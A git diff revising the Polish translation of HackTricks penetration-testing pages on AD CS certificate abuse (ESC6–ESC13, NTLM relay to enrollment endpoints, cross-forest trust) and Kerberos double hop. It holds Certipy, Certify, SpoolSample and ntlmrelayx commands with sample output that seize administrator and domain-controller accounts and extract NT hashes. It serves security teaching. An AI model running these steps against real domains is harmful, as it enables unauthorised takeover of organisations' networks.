@ -243,7 +243,7 @@ To zapewnia wgląd w podstawowe uprawnienia, mianowicie **`ManageCA`** i **`Mana
#### Nadużycie
Posiadanie uprawnień **`ManageCA`** w instytucji certyfikującej umożliwia podmiotowi zdalne manipulowanie ustawieniami za pomocą PSPKI. Obejmuje to przełączanie flagi **`EDITF_ATTRIBUTESUBJECTALTNAME2`** w celu zezwolenia na określenie SAN w dowolnym szablonie, co jest istotnym aspektem eskalacji domeny.
Posiadanie uprawnień **`ManageCA`** w instytucji certyfikującej umożliwia podmiotowi zdalne manipulowanie ustawieniami za pomocą PSPKI. Obejmuje to przełączanie flagi **`EDITF_ATTRIBUTESUBJECTALTNAME2`** w celu zezwolenia na określenie SAN w dowolnym szablonie, co stanowi istotny aspekt eskalacji domeny.
Uproszczenie tego procesu jest osiągalne poprzez użycie polecenia **Enable-PolicyModuleFlag** w PSPKI, umożliwiające modyfikacje bez bezpośredniej interakcji z interfejsem GUI.
@ -270,10 +270,10 @@ Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336
#### Wyjaśnienie
{% hint style="warning" %}
W **poprzednim ataku** wykorzystano uprawnienia **`Manage CA`** do **włączenia** flagi **EDITF\_ATTRIBUTESUBJECTALTNAME2** w celu przeprowadzenia ataku **ESC6**, ale nie będzie to miało żadnego efektu do czasu ponownego uruchomienia usługi CA (`CertSvc`). Gdy użytkownik ma prawo dostępu `Manage CA`, ma również uprawnienie do **ponownego uruchomienia usługi**. Jednakże **nie oznacza to, że użytkownik może zdalnie uruchomić usługę**. Ponadto **ESC6** może nie działać od razu w większości zaktualizowanych środowisk z powodu aktualizacji zabezpieczeń z maja 2022 roku.
W **poprzednim ataku** uprawnienia **`Manage CA`** zostały wykorzystane do **włączenia** flagi **EDITF\_ATTRIBUTESUBJECTALTNAME2** w celu przeprowadzenia ataku **ESC6**, ale nie będzie to miało żadnego efektu do momentu ponownego uruchomienia usługi CA (`CertSvc`). Gdy użytkownik ma prawo dostępu `Manage CA`, ma również uprawnienie do **ponownego uruchomienia usługi**. Jednakże **nie oznacza to, że użytkownik może zdalnie uruchomić usługę**. Ponadto **ESC6 może nie działać od razu** w większości zaktualizowanych środowisk z powodu aktualizacji zabezpieczeń z maja 2022 roku.
{% endhint %}
Dlatego przedstawiony jest tutaj kolejny atak.
Dlatego tutaj przedstawiony jest kolejny atak.
Wymagania wstępne:
@ -281,7 +281,7 @@ Wymagania wstępne:
* Uprawnienie **`Manage Certificates`** (może być udzielone z uprawnienia **`ManageCA`**)
* Szablon certyfikatu **`SubCA`** musi być **włączony** (może być włączony z uprawnienia **`ManageCA`**)
Technika polega na tym, że użytkownicy z uprawnieniem `Manage CA` _i_ `Manage Certificates` mogą **wydawać nieudane żądania certyfikatów**. Szablon certyfikatu **`SubCA`** jest **podatny na ESC1**, ale **tylko administratorzy** mogą zapisać się do szablonu. Dlatego **użytkownik** może **poprosić** o zapisanie się do **`SubCA`** - co zostanie **odrzucone** - ale **następnie wydane przez menedżera**.
Technika polega na tym, że użytkownicy posiadający uprawnienia `Manage CA` _i_ `Manage Certificates` mogą **wydawać nieudane żądania certyfikatów**. Szablon certyfikatu **`SubCA`** jest **podatny na ESC1**, ale **tylko administratorzy** mogą zapisać się do szablonu. Dlatego **użytkownik** może **poprosić** o zapisanie się do **`SubCA`** - co zostanie **odrzucone** - ale **następnie wydane przez menedżera**.
#### Nadużycie
@ -306,7 +306,7 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
```
Jeśli spełniliśmy wymagania wstępne dla tego ataku, możemy rozpocząć od **żądania certyfikatu opartego na szablonie `SubCA`**.
**To żądanie zostanie odrzucone**, ale zachowamy klucz prywatny i zapiszemy identyfikator żądania.
**To żądanie zostanie odrzucone**, ale zachowamy prywatny klucz i zapiszemy identyfikator żądania.
```bash
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -318,7 +318,7 @@ Would you like to save the private key? (y/N) y
[*] Saved private key to 785.key
[-] Failed to request certificate
```
Z naszymi **`Zarządzaj CA` i `Zarządzaj Certyfikatami`**, możemy następnie **wydać nieudane żądanie certyfikatu** za pomocą polecenia `ca` i parametru `-issue-request <ID żądania>`.
Z naszym **`Zarządzaj CA` i `Zarządzaj Certyfikatami`**, możemy następnie **wydać nieudany certyfikat** żądanie za pomocą polecenia `ca` i parametru `-issue-request <ID żądania>`.
```bash
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -342,23 +342,23 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
### Wyjaśnienie
{% hint style="info" %}
W środowiskach, gdzie **zainstalowano AD CS**, jeśli istnieje **podatny punkt końcowy do rejestracji internetowej** i co najmniej jeden **szablon certyfikatu jest opublikowany**, który pozwala na **rejestrację komputera domenowego i uwierzytelnianie klienta** (tak jak domyślny szablon **`Machine`**), staje się możliwe, że **dowolny komputer z usługą spoolera aktywną może zostać skompromitowany przez atakującego**!
W środowiskach, w których **zainstalowano AD CS**, jeśli istnieje **podatny punkt końcowy do zapisu sieciowego** i co najmniej jeden **szablon certyfikatu jest opublikowany**, który pozwala na **zapis komputera domeny i uwierzytelnianie klienta** (takie jak domyślny szablon **`Machine`**), staje się możliwe, że **dowolny komputer z usługą spoolera może zostać skompromitowany przez atakującego**!
{% endhint %}
Kilka **metod rejestracji opartych na HTTP** jest obsługiwanych przez AD CS, udostępniane poprzez dodatkowe role serwera, które administratorzy mogą zainstalować. Te interfejsy do rejestracji certyfikatów opartych na HTTP są podatne na **ataki NTLM relay**. Atakujący, z **skompromitowanego komputera, może podszyć się pod dowolne konto AD, które uwierzytelnia się za pomocą przychodzącego NTLM**. Podszywając się pod konto ofiary, atakujący może uzyskać dostęp do tych interfejsów sieciowych, aby **żądać certyfikatu uwierzytelniania klienta, korzystając z szablonów certyfikatów `User` lub `Machine`**.
Kilka **metod zapisu opartych na HTTP** jest obsługiwanych przez AD CS, udostępnianych poprzez dodatkowe role serwera, które administratorzy mogą zainstalować. Te interfejsy do zapisu certyfikatów opartych na HTTP są podatne na **ataki przekazywania NTLM**. Atakujący z **skompromitowanego komputera może podszyć się pod dowolne konto AD, które uwierzytelnia się za pomocą przychodzącego NTLM**. Podszywając się pod konto ofiary, atakujący może uzyskać dostęp do tych interfejsów sieciowych, aby **żądać certyfikatu uwierzytelniania klienta, korzystając z szablonów certyfikatów `User` lub `Machine`**.
* **Interfejs rejestracji internetowej** (starsza aplikacja ASP dostępna pod adresem `http://<caserver>/certsrv/`), domyślnie obsługuje tylko protokół HTTP, co nie zapewnia ochrony przed atakami NTLM relay. Dodatkowo, wyraźnie zezwala tylko na uwierzytelnianie NTLM za pomocą nagłówka HTTP Authorization, co uniemożliwia stosowanie bardziej bezpiecznych metod uwierzytelniania, takich jak Kerberos.
* **Usługa Rejestracji Certyfikatów** (CES), **Usługa Polityki Rejestracji Certyfikatów** (CEP) i **Usługa Rejestracji Urządzeń Sieciowych** (NDES) domyślnie obsługują uwierzytelnianie negocjowane za pomocą nagłówka HTTP Authorization. Uwierzytelnianie negocjowane **obsługuje zarówno** Kerberos, jak i **NTLM**, pozwalając atakującemu na **zmniejszenie do uwierzytelniania NTLM** podczas ataków relay. Chociaż te usługi sieciowe domyślnie obsługują HTTPS, samo HTTPS **nie chroni przed atakami NTLM relay**. Ochrona przed atakami NTLM relay dla usług HTTPS jest możliwa tylko wtedy, gdy HTTPS jest połączone z wiązaniem kanału. Niestety, AD CS nie aktywuje Rozszerzonej Ochrony dla Uwierzytelniania w IIS, co jest wymagane do wiązania kanałów.
* **Interfejs zapisu sieciowego** (starsza aplikacja ASP dostępna pod adresem `http://<caserver>/certsrv/`), domyślnie obsługuje tylko protokół HTTP, co nie zapewnia ochrony przed atakami przekazywania NTLM. Dodatkowo, wyraźnie zezwala tylko na uwierzytelnianie NTLM za pomocą nagłówka HTTP Authorization, co uniemożliwia stosowanie bardziej bezpiecznych metod uwierzytelniania, takich jak Kerberos.
* **Usługa Zapisu Certyfikatów** (CES), **Usługa Polityki Zapisu Certyfikatów** (CEP) i **Usługa Zapisu Urządzeń Sieciowych** (NDES) domyślnie obsługują uwierzytelnianie negocjacyjne za pomocą nagłówka HTTP Authorization. Uwierzytelnianie negocjacyjne **obsługuje zarówno** Kerberos, jak i **NTLM**, pozwalając atakującemu **zmniejszyć poziom uwierzytelniania do NTLM** podczas ataków przekazywania. Chociaż te usługi sieciowe domyślnie obsługują protokół HTTPS, samo HTTPS **nie chroni przed atakami przekazywania NTLM**. Ochrona przed atakami przekazywania NTLM dla usług HTTPS jest możliwa tylko wtedy, gdy HTTPS jest połączone z powiązaniem kanału. Niestety AD CS nie aktywuje Rozszerzonej Ochrony dla Uwierzytelniania w IIS, co jest wymagane do powiązania kanału.
Powszechnym **problemem** z atakami NTLM relay jest **krótki czas trwania sesji NTLM** i niemożność atakującego interakcji z usługami, które **wymagają podpisu NTLM**.
Powszechnym **problemem** z atakami przekazywania NTLM jest **krótki czas trwania sesji NTLM** i niemożność atakującego interakcji z usługami, które **wymagają podpisu NTLM**.
Niemniej jednak, to ograniczenie jest pokonywane poprzez wykorzystanie ataku NTLM relay do uzyskania certyfikatu dla użytkownika, ponieważ okres ważności certyfikatu określa czas trwania sesji, a certyfikat może być używany z usługami, które **wymagają podpisu NTLM**. Aby uzyskać instrukcje dotyczące wykorzystania skradzionego certyfikatu, zapoznaj się z:
Niemniej jednak, to ograniczenie jest pokonywane poprzez wykorzystanie ataku przekazywania NTLM do uzyskania certyfikatu dla użytkownika, ponieważ okres ważności certyfikatu określa czas trwania sesji, a certyfikat może być używany z usługami, które **wymagają podpisu NTLM**. Aby uzyskać instrukcje dotyczące wykorzystania skradzionego certyfikatu, zapoznaj się z:
{% content-ref url="account-persistence.md" %}
[account-persistence.md](account-persistence.md)
{% endcontent-ref %}
Kolejnym ograniczeniem ataków NTLM relay jest to, że **maszyna kontrolowana przez atakującego musi zostać uwierzytelniona przez konto ofiary**. Atakujący może albo czekać, albo próbować **wymusić** to uwierzytelnienie:
Kolejnym ograniczeniem ataków przekazywania NTLM jest to, że **maszyna kontrolowana przez atakującego musi zostać uwierzytelniona przez konto ofiary**. Atakujący może albo czekać, albo próbować **wymusić** to uwierzytelnienie:
{% content-ref url="../printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md)
@ -366,13 +366,13 @@ Kolejnym ograniczeniem ataków NTLM relay jest to, że **maszyna kontrolowana pr
### **Wykorzystanie**
[**Certify**](https://github.com/GhostPack/Certify)s `cas` wylicza **włączone punkty końcowe HTTP AD CS**:
[**Certify**](https://github.com/GhostPack/Certify) `cas` wylicza **włączone punkty końcowe HTTP AD CS**:
```
Certify.exe cas
```
<figure><img src="../../../.gitbook/assets/image (69).png" alt=""><figcaption></figcaption></figure>
Właściwość `msPKI-Enrollment-Servers` jest używana przez przedsiębiorstwowe władze certyfikujące (CAs) do przechowywania punktów końcowych Usługi Enrollingu Certyfikatów (CES). Te punkty końcowe można analizować i wyświetlać, korzystając z narzędzia **Certutil.exe**:
Właściwość `msPKI-Enrollment-Servers` jest używana przez przedsiębiorstwowe władze certyfikujące (CAs) do przechowywania punktów końcowych Usługi Enrollingu Certyfikatów (CES). Te punkty końcowe mogą być analizowane i wyświetlane za pomocą narzędzia **Certutil.exe**:
```
certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
```
@ -383,7 +383,7 @@ Get-CertificationAuthority | select Name,Enroll* | Format-List *
```
<figure><img src="../../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
#### Nadużycie z certyfikatem
#### Nadużycie z Certify
```bash
## In the victim machine
# Prepare to send traffic to the compromised machine 445 port to 445 in the attackers machine
@ -400,9 +400,9 @@ execute-assembly C:\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe <victim> <
```
#### Wykorzystanie [Certipy](https://github.com/ly4k/Certipy)
Żądanie certyfikatu jest domyślnie tworzone przez Certipy na podstawie szablonu `Machine` lub `User`, określonego na podstawie tego, czy nazwa konta kończy się na `$`. Określenie alternatywnego szablonu można osiągnąć poprzez użycie parametru `-template`.
Żądanie certyfikatu jest domyślnie wykonywane przez Certipy na podstawie szablonu `Machine` lub `User`, określonego na podstawie tego, czy nazwa konta kończy się na `$`. Określenie alternatywnego szablonu można osiągnąć za pomocą parametru `-template`.
Technika taka jak [PetitPotam](https://github.com/ly4k/PetitPotam) może być następnie wykorzystana do wymuszenia uwierzytelnienia. Przy pracy z kontrolerami domeny, konieczne jest określenie `-template DomainController`.
Technika taka jak [PetitPotam](https://github.com/ly4k/PetitPotam) może być następnie wykorzystana do wymuszenia uwierzytelnienia. Przy pracy z kontrolerami domeny wymagane jest określenie `-template DomainController`.
```bash
certipy relay -ca ca.corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
@ -423,7 +423,7 @@ Nowa wartość **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) dla **`msPKI-Enro
Warunki, w których ustawienie tej flagi staje się istotne, obejmują:
* `StrongCertificateBindingEnforcement` nie jest dostosowane do `2` (domyślnie jest to `1`), lub `CertificateMappingMethods` zawiera flagę `UPN`.
* `StrongCertificateBindingEnforcement` nie jest dostosowany do `2` (domyślnie jest to `1`), lub `CertificateMappingMethods` zawiera flagę `UPN`.
* Certyfikat jest oznaczony flagą `CT_FLAG_NO_SECURITY_EXTENSION` w ustawieniu `msPKI-Enrollment-Flag`.
* Certyfikat określa dowolne EKU uwierzytelniania klienta.
* Dostępne są uprawnienia `GenericWrite` do kompromitacji innego konta.
@ -432,27 +432,27 @@ Warunki, w których ustawienie tej flagi staje się istotne, obejmują:
Załóżmy, że `John@corp.local` posiada uprawnienia `GenericWrite` nad `Jane@corp.local`, z celem skompromitowania `Administrator@corp.local`. Szablon certyfikatu `ESC9`, do którego `Jane@corp.local` ma prawo zapisu, jest skonfigurowany z flagą `CT_FLAG_NO_SECURITY_EXTENSION` w ustawieniu `msPKI-Enrollment-Flag`.
Początkowo, skrót `Jane` jest pozyskiwany za pomocą Cieniowych Poświadczeń, dzięki uprawnieniom `GenericWrite` `Johna`:
Początkowo skrót `Jane` jest pozyskiwany za pomocą Cieniowych Poświadczeń, dzięki uprawnieniom `GenericWrite` `Johna`:
```bash
certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane
```
Następnie `userPrincipalName` `Jane` zostaje zmodyfikowany na `Administrator`, celowo pomijając część domeny `@corp.local`:
Następnie `userPrincipalName` użytkownika `Jane` zostaje zmodyfikowany na `Administrator`, celowo pomijając część domeny `@corp.local`:
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
```
Ta modyfikacja nie narusza ograniczeń, ponieważ `Administrator@corp.local` pozostaje odrębnym `userPrincipalName` dla `Administrator`.
Ta modyfikacja nie narusza ograniczeń, pod warunkiem, że `Administrator@corp.local` pozostaje odrębny jako `userPrincipalName` `Administratora`.
W związku z tym, szablon certyfikatu `ESC9`, oznaczony jako podatny, jest żądany jako `Jane`:
W związku z tym szablon certyfikatu `ESC9`, oznaczony jako podatny, jest żądany jako `Jane`:
```bash
certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9
```
Zauważono, że atrybut `userPrincipalName` certyfikatu odzwierciedla `Administrator`, pozbawiony "object SID".
Zauważono, że atrybut `userPrincipalName` certyfikatu odzwierciedla `Administrator`, pozbawiony jakiegokolwiek „object SID”.
Następnie `userPrincipalName` dla `Jane` zostaje przywrócone do jej pierwotnego wartości, czyli `Jane@corp.local`:
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
```
Próba uwierzytelnienia za pomocą wydanego certyfikatu teraz zwraca wartość skrótu NT `Administrator@corp.local`. Polecenie musi zawierać `-domain <domain>`, ze względu na brak określenia domeny w certyfikacie:
Próba uwierzytelnienia za pomocą wydanego certyfikatu teraz zwraca wartość skrótu NT dla `Administrator@corp.local`. Polecenie musi zawierać `-domain <domain>` z powodu braku określenia domeny w certyfikacie:
```bash
certipy auth -pfx adminitrator.pfx -domain corp.local
```
@ -475,15 +475,15 @@ Jeśli `CertificateMappingMethods` zawiera bit `UPN` (`0x4`).
### Przypadek nadużycia 1
Z `StrongCertificateBindingEnforcement` skonfigurowanym jako `0`, konto A z uprawnieniami `GenericWrite` może zostać wykorzystane do skompromitowania dowolnego konta B.
Gdy `StrongCertificateBindingEnforcement` jest skonfigurowane jako `0`, konto A z uprawnieniami `GenericWrite` może zostać wykorzystane do skompromitowania dowolnego konta B.
Na przykład, mając uprawnienia `GenericWrite` nad `Jane@corp.local`, atakujący ma na celu skompromitowanie `Administrator@corp.local`. Procedura jest podobna do ESC9, pozwalając na wykorzystanie dowolnego szablonu certyfikatu.
Na przykład, mając uprawnienia `GenericWrite` nad `Jane@corp.local`, atakujący ma na celu skompromitowanie `Administrator@corp.local`. Procedura jest podobna do ESC9, umożliwiając wykorzystanie dowolnego szablonu certyfikatu.
Początkowo, skrót `Jane` jest pozyskiwany za pomocą Cienkich Poświadczeń, wykorzystując `GenericWrite`.
Początkowo, skrót `Jane` jest pozyskiwany za pomocą Cieniowych Poświadczeń, wykorzystując `GenericWrite`.
```bash
certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane
```
Następnie `userPrincipalName` `Jane` zostaje zmienione na `Administrator`, celowo pomijając część `@corp.local`, aby uniknąć naruszenia ograniczeń.
Następnie `userPrincipalName` użytkownika `Jane` zostaje zmienione na `Administrator`, celowo pomijając część `@corp.local`, aby uniknąć naruszenia ograniczeń.
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
```
@ -495,15 +495,15 @@ certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
```
Autoryzacja za pomocą uzyskanego certyfikatu ujawni wartość skrótu NT dla `Administrator@corp.local`, co wymaga określenia domeny w poleceniu ze względu na brak szczegółów domeny w certyfikacie.
Autoryzacja za pomocą uzyskanego certyfikatu ujawni wartość skrótu NT dla `Administrator@corp.local`, co wymaga określenia domeny w poleceniu z powodu braku szczegółów domeny w certyfikacie.
```bash
certipy auth -pfx administrator.pfx -domain corp.local
```
### Przypadek nadużycia 2
Dzięki `CertificateMappingMethods` zawierającemu flagę `UPN` (`0x4`), konto A z uprawnieniami `GenericWrite` może skompromitować dowolne konto B, które nie ma właściwości `userPrincipalName`, w tym konta maszynowe i wbudowanego administratora domeny `Administrator`.
Dzięki `CertificateMappingMethods` zawierającemu flagę `UPN` (`0x4`), konto A posiadające uprawnienia `GenericWrite` może skompromitować dowolne konto B, które nie ma właściwości `userPrincipalName`, w tym konta maszynowe i wbudowane konto administratora domeny `Administrator`.
Celem jest skompromitowanie `DC$@corp.local`, zaczynając od uzyskania hasha `Jane` poprzez Shadow Credentials, wykorzystując `GenericWrite`.
Celem jest skompromitowanie `DC$@corp.local`, zaczynając od uzyskania hasła `Jane` poprzez Shadow Credentials, wykorzystując `GenericWrite`.
```bash
certipy shadow auto -username John@corp.local -p Passw0rd! -account Jane
```
@ -515,15 +515,15 @@ Wniosek o certyfikat do uwierzytelniania klienta jest składany jako `Jane` przy
```bash
certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
```
`userPrincipalName` użytkownika `Jane` jest przywracane do jego pierwotnej postaci po tym procesie.
`userPrincipalName` użytkownika `Jane` jest przywracane do swojej pierwotnej postaci po tym procesie.
```bash
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'Jane@corp.local'
```
Aby uwierzytelnić się za pomocą Schannel, wykorzystywana jest opcja `-ldap-shell` w Certipy, co wskazuje na sukces uwierzytelnienia jako `u:CORP\DC$`.
Aby uwierzytelnić się za pomocą Schannel, wykorzystywana jest opcja `-ldap-shell` w Certipy, wskazująca na sukces uwierzytelnienia jako `u:CORP\DC$`.
```bash
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
```
Za pomocą powłoki LDAP polecenia takie jak `set_rbcd` umożliwiają ataki oparte na zasobach (RBCD), potencjalnie kompromitując kontroler domeny.
Za pomocą powłoki LDAP polecenia takie jak `set_rbcd` umożliwiają ataki oparte na zleceniach zasobów (RBCD), potencjalnie kompromitując kontroler domeny.
```bash
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
```
@ -573,17 +573,17 @@ Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Saved certificate and private key to 'administrator.pfx'
[*] Exiting...
```
W przypadku kontrolerów domeny musimy określić `-template` w DomainController.
**Uwaga:** Dla kontrolerów domeny musimy określić `-template` w DomainController.
Lub używając [forka impacket autorstwa sploutchy'ego](https://github.com/sploutchy/impacket):
``` bash
$ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -smb2support
```
## Dostęp do powłoki ADCS CA za pomocą YubiHSM - ESC12
## Dostęp do powłoki ADCS CA z YubiHSM - ESC12
### Wyjaśnienie
Administratorzy mogą skonfigurować Certyfikat Uprawnień w celu przechowywania go na zewnętrznym urządzeniu, takim jak "Yubico YubiHSM2".
Administratorzy mogą skonfigurować Certyfikat Uprawnień do przechowywania go na zewnętrznym urządzeniu, takim jak "Yubico YubiHSM2".
Jeśli urządzenie USB jest podłączone do serwera CA za pośrednictwem portu USB, lub serwer urządzeń USB w przypadku, gdy serwer CA jest maszyną wirtualną, wymagany jest klucz uwierzytelniania (czasami nazywany "hasłem") dla dostawcy przechowywania kluczy w celu generowania i wykorzystywania kluczy w YubiHSM.
@ -633,11 +633,11 @@ OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.3025710.4393146.2181807.139243
OID msDS-OIDToGroupLink: CN=VulnerableGroup,CN=Users,DC=domain,DC=local
------------------------
```
### Scenariusz nadużycia
### Szkic nadużycia
Znajdź uprawnienia użytkownika, które można użyć za pomocą `certipy find` lub `Certify.exe find /showAllPermissions`.
Jeśli `John` ma uprawnienia do zapisywania `VulnerableTemplate`, użytkownik może odziedziczyć uprawnienia grupy `VulnerableGroup`.
Jeśli `John` ma uprawnienia do zapisywania w `VulnerableTemplate`, użytkownik może odziedziczyć uprawnienia grupy `VulnerableGroup`.
Wystarczy, że określi szablon, a otrzyma certyfikat z uprawnieniami OIDToGroupLink.
```bash
@ -647,11 +647,11 @@ certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target
### Łamanie Zaufania Lasów poprzez Skompromitowane CA
Konfiguracja **enrollmentu między lasami** jest stosunkowo prosta. **Certyfikat root CA** z lasu zasobów jest **opublikowany w lasach kont** przez administratorów, a certyfikaty **enterprise CA** z lasu zasobów są **dodane do kontenerów `NTAuthCertificates` i AIA w każdym z lasów kont**. Dla jasności, ta konfiguracja nadaje **CA w lesie zasobów pełną kontrolę** nad wszystkimi innymi lasami, którymi zarządza PKI. Jeśli ten CA zostanie **skompromitowany przez atakujących**, certyfikaty dla wszystkich użytkowników zarówno z lasu zasobów, jak i lasów kont mogą zostać **podrabiane przez nich**, co prowadzi do złamania granicy bezpieczeństwa lasu.
Konfiguracja **enrollmentu między lasami** jest stosunkowo prosta. **Certyfikat root CA** z lasu zasobów jest **opublikowany w lasach kont** przez administratorów, a certyfikaty **enterprise CA** z lasu zasobów są **dodane do kontenerów `NTAuthCertificates` i AIA w każdym z lasów kont**. Dla jasności, ta konfiguracja nadaje **CA w lesie zasobów pełną kontrolę** nad wszystkimi innymi lasami, którymi zarządza PKI. Jeśli ten CA zostanie **skompromitowany przez atakujących**, certyfikaty dla wszystkich użytkowników zarówno z lasu zasobów, jak i z lasów kont, mogą zostać **podrabiane przez nich**, łamiąc tym samym granicę bezpieczeństwa lasu.
### Przyznawanie Uprawnień do Enrollmentu Obcym Podmiotom
W środowiskach wielolasowych należy zachować ostrożność w odniesieniu do Enterprise CA, które **publikują szablony certyfikatów**, które pozwalają **Uwierzytelnionym Użytkownikom lub obcym podmiotom** (użytkownikom/grupom spoza lasu, do którego należy Enterprise CA) na **prawa do enrollmentu i edycji**.\
Podczas uwierzytelniania przez zaufanie, SID **Uwierzytelnionych Użytkowników** jest dodawany do tokena użytkownika przez AD. Dlatego jeśli domena posiada Enterprise CA z szablonem, który **pozwala Uwierzytelnionym Użytkownikom na prawa do enrollmentu**, szablon może potencjalnie być **zainstalowany przez użytkownika z innego lasu**. Podobnie, jeśli **prawa do enrollmentu są wyraźnie przyznane obcemu podmiotowi przez szablon**, w ten sposób tworzony jest **międzylasowy związek kontroli dostępu**, umożliwiający podmiotowi z jednego lasu **zainstalowanie szablonu z innego lasu**.
W środowiskach wielolasowych należy ostrożnie podchodzić do Enterprise CA, które **publikują szablony certyfikatów**, które pozwalają **Uwierzytelnionym Użytkownikom lub obcym podmiotom** (użytkownikom/grupom spoza lasu, do którego należy Enterprise CA) na **prawa do enrollmentu i edycji**.\
Podczas uwierzytelniania przez zaufanie, SID **Uwierzytelnionych Użytkowników** jest dodawany do tokena użytkownika przez AD. Dlatego jeśli domena posiada Enterprise CA z szablonem, który **pozwala Uwierzytelnionym Użytkownikom na prawa do enrollmentu**, szablon mógłby potencjalnie zostać **zainstalowany przez użytkownika z innego lasu**. Podobnie, jeśli **prawa do enrollmentu są wyraźnie przyznane obcemu podmiotowi przez szablon**, w ten sposób tworzony jest **międzylasowy związek kontroli dostępu**, umożliwiający podmiotowi z jednego lasu **zainstalowanie szablonu z innego lasu**.
Oba scenariusze prowadzą do **zwiększenia powierzchni ataku** z jednego lasu na drugi. Ustawienia szablonu certyfikatu mogą być wykorzystane przez atakującego do uzyskania dodatkowych uprawnień w obcej domenie.
Oba scenariusze prowadzą do **zwiększenia powierzchni ataku** z jednego lasu do drugiego. Ustawienia szablonu certyfikatu mogą zostać wykorzystane przez atakującego do uzyskania dodatkowych uprawnień w obcej domenie.

32
windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
View file

@ -2,9 +2,9 @@
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Nauka hakerskiego AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć **reklamę swojej firmy na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,7 +12,7 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -27,37 +27,37 @@ Dzieje się tak, ponieważ podczas łączenia się za pomocą Kerberos zachodzą
1. Użytkownik1 podaje poświadczenia, a **kontroler domeny** zwraca użytkownikowi1 **TGT** Kerberos.
2. Użytkownik1 używa **TGT** do żądania **biletu usługi** w celu **połączenia** z Serwerem1.
3. Użytkownik1 **łączy się** z **Serwerem1** i dostarcza **bilet usługi**.
4. **Serwer1** **nie ma** **przechowywanych poświadczeń** użytkownika1 ani **TGT** użytkownika1. Dlatego gdy użytkownik1 z Serwera1 próbuje zalogować się na drugi serwer, nie jest **w stanie się uwierzytelnić**.
4. **Serwer1** **nie ma** **przechowywanych poświadczeń** użytkownika1 ani **TGT** użytkownika1. Dlatego gdy Użytkownik1 z Serwera1 próbuje zalogować się na drugi serwer, nie jest **w stanie się uwierzytelnić**.
### Nieograniczone przekazywanie
Jeśli jest włączone **nieograniczone przekazywanie** na PC, to nie wystąpi to, ponieważ **Serwer** otrzyma **TGT** każdego użytkownika, który się do niego loguje. Ponadto, jeśli jest używane nieograniczone przekazywanie, prawdopodobnie można **skompromitować kontroler domeny**.\
Jeśli jest włączone **nieograniczone przekazywanie** na PC, to nie wystąpi ten problem, ponieważ **Serwer** otrzyma **TGT** każdego użytkownika, który się do niego łączy. Ponadto, jeśli jest używane nieograniczone przekazywanie, prawdopodobnie można **skompromitować kontroler domeny** z niego.\
[**Więcej informacji na stronie dotyczącej nieograniczonego przekazywania**](unconstrained-delegation.md).
### CredSSP
